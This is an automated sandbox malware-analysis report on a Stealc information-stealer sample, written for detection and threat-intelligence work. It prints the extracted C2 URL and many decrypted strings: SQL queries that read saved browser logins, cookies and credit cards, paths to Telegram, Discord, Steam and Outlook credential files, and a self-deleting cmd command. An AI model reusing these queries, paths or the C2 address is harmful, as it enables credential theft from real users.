
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1545325
MD5: 9ec79eac864343887ecdf94b7d236918
SHA1: d9eceb6242f24ec369d4b60a78b2c52c1947a5dd
SHA256: 29fe5af75f0c521b5bea21d6e5158c96a139269e463b6e8ee1760ed5e1000f44
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9EC79EAC864343887ECDF94B7D236918)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000000.00000003.2050733563.0000000005260000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 7096 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 7096 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.file.exe.810000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-30T12:36:05.671519+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.810000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 0.2.file.exe.810000.0.unpack | String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.810000.0.unpack | String decryptor: 30
Source: 0.2.file.exe.810000.0.unpack | String decryptor: 11
Source: 0.2.file.exe.810000.0.unpack | String decryptor: 20
Source: 0.2.file.exe.810000.0.unpack | String decryptor: 24
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetProcAddress
Source: 0.2.file.exe.810000.0.unpack | String decryptor: LoadLibraryA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: lstrcatA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: OpenEventA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CreateEventA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CloseHandle
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Sleep
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.810000.0.unpack | String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.810000.0.unpack | String decryptor: VirtualFree
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetSystemInfo
Source: 0.2.file.exe.810000.0.unpack | String decryptor: VirtualAlloc
Source: 0.2.file.exe.810000.0.unpack | String decryptor: HeapAlloc
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetComputerNameA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: lstrcpyA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetProcessHeap
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetCurrentProcess
Source: 0.2.file.exe.810000.0.unpack | String decryptor: lstrlenA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: ExitProcess
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetSystemTime
Source: 0.2.file.exe.810000.0.unpack | String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.810000.0.unpack | String decryptor: advapi32.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: gdi32.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: user32.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: crypt32.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: ntdll.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetUserNameA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CreateDCA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetDeviceCaps
Source: 0.2.file.exe.810000.0.unpack | String decryptor: ReleaseDC
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: sscanf
Source: 0.2.file.exe.810000.0.unpack | String decryptor: VMwareVMware
Source: 0.2.file.exe.810000.0.unpack | String decryptor: HAL9TH
Source: 0.2.file.exe.810000.0.unpack | String decryptor: JohnDoe
Source: 0.2.file.exe.810000.0.unpack | String decryptor: DISPLAY
Source: 0.2.file.exe.810000.0.unpack | String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.810000.0.unpack | String decryptor: http://185.215.113.206
Source: 0.2.file.exe.810000.0.unpack | String decryptor: bksvnsj
Source: 0.2.file.exe.810000.0.unpack | String decryptor: /6c4adf523b719729.php
Source: 0.2.file.exe.810000.0.unpack | String decryptor: /746f34465cf17784/
Source: 0.2.file.exe.810000.0.unpack | String decryptor: tale
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetFileAttributesA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GlobalLock
Source: 0.2.file.exe.810000.0.unpack | String decryptor: HeapFree
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetFileSize
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GlobalSize
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.810000.0.unpack | String decryptor: IsWow64Process
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Process32Next
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetLocalTime
Source: 0.2.file.exe.810000.0.unpack | String decryptor: FreeLibrary
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Process32First
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: DeleteFileA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: FindNextFileA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: LocalFree
Source: 0.2.file.exe.810000.0.unpack | String decryptor: FindClose
Source: 0.2.file.exe.810000.0.unpack | String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: LocalAlloc
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetFileSizeEx
Source: 0.2.file.exe.810000.0.unpack | String decryptor: ReadFile
Source: 0.2.file.exe.810000.0.unpack | String decryptor: SetFilePointer
Source: 0.2.file.exe.810000.0.unpack | String decryptor: WriteFile
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CreateFileA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: FindFirstFileA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CopyFileA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: VirtualProtect
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetLastError
Source: 0.2.file.exe.810000.0.unpack | String decryptor: lstrcpynA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GlobalFree
Source: 0.2.file.exe.810000.0.unpack | String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GlobalAlloc
Source: 0.2.file.exe.810000.0.unpack | String decryptor: OpenProcess
Source: 0.2.file.exe.810000.0.unpack | String decryptor: TerminateProcess
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.810000.0.unpack | String decryptor: gdiplus.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: ole32.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: bcrypt.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: wininet.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: shlwapi.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: shell32.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: psapi.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.810000.0.unpack | String decryptor: SelectObject
Source: 0.2.file.exe.810000.0.unpack | String decryptor: BitBlt
Source: 0.2.file.exe.810000.0.unpack | String decryptor: DeleteObject
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GdiplusStartup
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GdiplusShutdown
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GdipDisposeImage
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GdipFree
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CoUninitialize
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CoInitialize
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CoCreateInstance
Source: 0.2.file.exe.810000.0.unpack | String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.810000.0.unpack | String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.810000.0.unpack | String decryptor: BCryptDecrypt
Source: 0.2.file.exe.810000.0.unpack | String decryptor: BCryptSetProperty
Source: 0.2.file.exe.810000.0.unpack | String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.810000.0.unpack | String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetWindowRect
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetDesktopWindow
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetDC
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CloseWindow
Source: 0.2.file.exe.810000.0.unpack | String decryptor: wsprintfA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CharToOemW
Source: 0.2.file.exe.810000.0.unpack | String decryptor: wsprintfW
Source: 0.2.file.exe.810000.0.unpack | String decryptor: RegQueryValueExA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: RegCloseKey
Source: 0.2.file.exe.810000.0.unpack | String decryptor: RegEnumValueA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CryptUnprotectData
Source: 0.2.file.exe.810000.0.unpack | String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: ShellExecuteExA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: InternetConnectA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: InternetCloseHandle
Source: 0.2.file.exe.810000.0.unpack | String decryptor: InternetOpenA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: HttpSendRequestA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: InternetReadFile
Source: 0.2.file.exe.810000.0.unpack | String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: StrCmpCA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: StrStrA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: StrCmpCW
Source: 0.2.file.exe.810000.0.unpack | String decryptor: PathMatchSpecA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.810000.0.unpack | String decryptor: RmStartSession
Source: 0.2.file.exe.810000.0.unpack | String decryptor: RmRegisterResources
Source: 0.2.file.exe.810000.0.unpack | String decryptor: RmGetList
Source: 0.2.file.exe.810000.0.unpack | String decryptor: RmEndSession
Source: 0.2.file.exe.810000.0.unpack | String decryptor: sqlite3_open
Source: 0.2.file.exe.810000.0.unpack | String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.810000.0.unpack | String decryptor: sqlite3_step
Source: 0.2.file.exe.810000.0.unpack | String decryptor: sqlite3_column_text
Source: 0.2.file.exe.810000.0.unpack | String decryptor: sqlite3_finalize
Source: 0.2.file.exe.810000.0.unpack | String decryptor: sqlite3_close
Source: 0.2.file.exe.810000.0.unpack | String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.810000.0.unpack | String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.810000.0.unpack | String decryptor: encrypted_key
Source: 0.2.file.exe.810000.0.unpack | String decryptor: PATH
Source: 0.2.file.exe.810000.0.unpack | String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: NSS_Init
Source: 0.2.file.exe.810000.0.unpack | String decryptor: NSS_Shutdown
Source: 0.2.file.exe.810000.0.unpack | String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.810000.0.unpack | String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.810000.0.unpack | String decryptor: PK11_Authenticate
Source: 0.2.file.exe.810000.0.unpack | String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.810000.0.unpack | String decryptor: C:\ProgramData\
Source: 0.2.file.exe.810000.0.unpack | String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.810000.0.unpack | String decryptor: browser:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: profile:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: url:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: login:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: password:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Opera
Source: 0.2.file.exe.810000.0.unpack | String decryptor: OperaGX
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Network
Source: 0.2.file.exe.810000.0.unpack | String decryptor: cookies
Source: 0.2.file.exe.810000.0.unpack | String decryptor: .txt
Source: 0.2.file.exe.810000.0.unpack | String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.810000.0.unpack | String decryptor: TRUE
Source: 0.2.file.exe.810000.0.unpack | String decryptor: FALSE
Source: 0.2.file.exe.810000.0.unpack | String decryptor: autofill
Source: 0.2.file.exe.810000.0.unpack | String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.810000.0.unpack | String decryptor: history
Source: 0.2.file.exe.810000.0.unpack | String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.810000.0.unpack | String decryptor: cc
Source: 0.2.file.exe.810000.0.unpack | String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.810000.0.unpack | String decryptor: name:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: month:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: year:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: card:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Cookies
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Login Data
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Web Data
Source: 0.2.file.exe.810000.0.unpack | String decryptor: History
Source: 0.2.file.exe.810000.0.unpack | String decryptor: logins.json
Source: 0.2.file.exe.810000.0.unpack | String decryptor: formSubmitURL
Source: 0.2.file.exe.810000.0.unpack | String decryptor: usernameField
Source: 0.2.file.exe.810000.0.unpack | String decryptor: encryptedUsername
Source: 0.2.file.exe.810000.0.unpack | String decryptor: encryptedPassword
Source: 0.2.file.exe.810000.0.unpack | String decryptor: guid
Source: 0.2.file.exe.810000.0.unpack | String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.810000.0.unpack | String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.810000.0.unpack | String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.810000.0.unpack | String decryptor: cookies.sqlite
Source: 0.2.file.exe.810000.0.unpack | String decryptor: formhistory.sqlite
Source: 0.2.file.exe.810000.0.unpack | String decryptor: places.sqlite
Source: 0.2.file.exe.810000.0.unpack | String decryptor: plugins
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Local Extension Settings
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Sync Extension Settings
Source: 0.2.file.exe.810000.0.unpack | String decryptor: IndexedDB
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Opera Stable
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Opera GX Stable
Source: 0.2.file.exe.810000.0.unpack | String decryptor: CURRENT
Source: 0.2.file.exe.810000.0.unpack | String decryptor: chrome-extension_
Source: 0.2.file.exe.810000.0.unpack | String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Local State
Source: 0.2.file.exe.810000.0.unpack | String decryptor: profiles.ini
Source: 0.2.file.exe.810000.0.unpack | String decryptor: chrome
Source: 0.2.file.exe.810000.0.unpack | String decryptor: opera
Source: 0.2.file.exe.810000.0.unpack | String decryptor: firefox
Source: 0.2.file.exe.810000.0.unpack | String decryptor: wallets
Source: 0.2.file.exe.810000.0.unpack | String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.810000.0.unpack | String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.810000.0.unpack | String decryptor: ProductName
Source: 0.2.file.exe.810000.0.unpack | String decryptor: x32
Source: 0.2.file.exe.810000.0.unpack | String decryptor: x64
Source: 0.2.file.exe.810000.0.unpack | String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.810000.0.unpack | String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.810000.0.unpack | String decryptor: ProcessorNameString
Source: 0.2.file.exe.810000.0.unpack | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.810000.0.unpack | String decryptor: DisplayName
Source: 0.2.file.exe.810000.0.unpack | String decryptor: DisplayVersion
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Network Info:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - IP: IP?
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - Country: ISO?
Source: 0.2.file.exe.810000.0.unpack | String decryptor: System Summary:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - HWID:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - OS:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - Architecture:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - UserName:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - Computer Name:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - Local Time:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - UTC:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - Language:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - Keyboards:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - Laptop:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - Running Path:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - CPU:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - Threads:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - Cores:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - RAM:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - Display Resolution:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: - GPU:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: User Agents:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Installed Apps:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: All Users:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Current User:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Process List:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: system_info.txt
Source: 0.2.file.exe.810000.0.unpack | String decryptor: freebl3.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: mozglue.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: msvcp140.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: nss3.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: softokn3.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: vcruntime140.dll
Source: 0.2.file.exe.810000.0.unpack | String decryptor: \Temp\
Source: 0.2.file.exe.810000.0.unpack | String decryptor: .exe
Source: 0.2.file.exe.810000.0.unpack | String decryptor: runas
Source: 0.2.file.exe.810000.0.unpack | String decryptor: open
Source: 0.2.file.exe.810000.0.unpack | String decryptor: /c start
Source: 0.2.file.exe.810000.0.unpack | String decryptor: %DESKTOP%
Source: 0.2.file.exe.810000.0.unpack | String decryptor: %APPDATA%
Source: 0.2.file.exe.810000.0.unpack | String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.810000.0.unpack | String decryptor: %USERPROFILE%
Source: 0.2.file.exe.810000.0.unpack | String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.810000.0.unpack | String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.810000.0.unpack | String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.810000.0.unpack | String decryptor: %RECENT%
Source: 0.2.file.exe.810000.0.unpack | String decryptor: *.lnk
Source: 0.2.file.exe.810000.0.unpack | String decryptor: files
Source: 0.2.file.exe.810000.0.unpack | String decryptor: \discord\
Source: 0.2.file.exe.810000.0.unpack | String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.810000.0.unpack | String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.810000.0.unpack | String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.810000.0.unpack | String decryptor: key_datas
Source: 0.2.file.exe.810000.0.unpack | String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.810000.0.unpack | String decryptor: map*
Source: 0.2.file.exe.810000.0.unpack | String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.810000.0.unpack | String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.810000.0.unpack | String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Telegram
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Tox
Source: 0.2.file.exe.810000.0.unpack | String decryptor: *.tox
Source: 0.2.file.exe.810000.0.unpack | String decryptor: *.ini
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Password
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.810000.0.unpack | String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.810000.0.unpack | String decryptor: 00000001
Source: 0.2.file.exe.810000.0.unpack | String decryptor: 00000002
Source: 0.2.file.exe.810000.0.unpack | String decryptor: 00000003
Source: 0.2.file.exe.810000.0.unpack | String decryptor: 00000004
Source: 0.2.file.exe.810000.0.unpack | String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Pidgin
Source: 0.2.file.exe.810000.0.unpack | String decryptor: \.purple\
Source: 0.2.file.exe.810000.0.unpack | String decryptor: accounts.xml
Source: 0.2.file.exe.810000.0.unpack | String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.810000.0.unpack | String decryptor: token:
Source: 0.2.file.exe.810000.0.unpack | String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.810000.0.unpack | String decryptor: SteamPath
Source: 0.2.file.exe.810000.0.unpack | String decryptor: \config\
Source: 0.2.file.exe.810000.0.unpack | String decryptor: ssfn*
Source: 0.2.file.exe.810000.0.unpack | String decryptor: config.vdf
Source: 0.2.file.exe.810000.0.unpack | String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.810000.0.unpack | String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.810000.0.unpack | String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.810000.0.unpack | String decryptor: loginusers.vdf
                Source: 0.2.file.exe.810000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.810000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.810000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.810000.0.unpackString decryptor: done
                Source: 0.2.file.exe.810000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.810000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.810000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.810000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.810000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
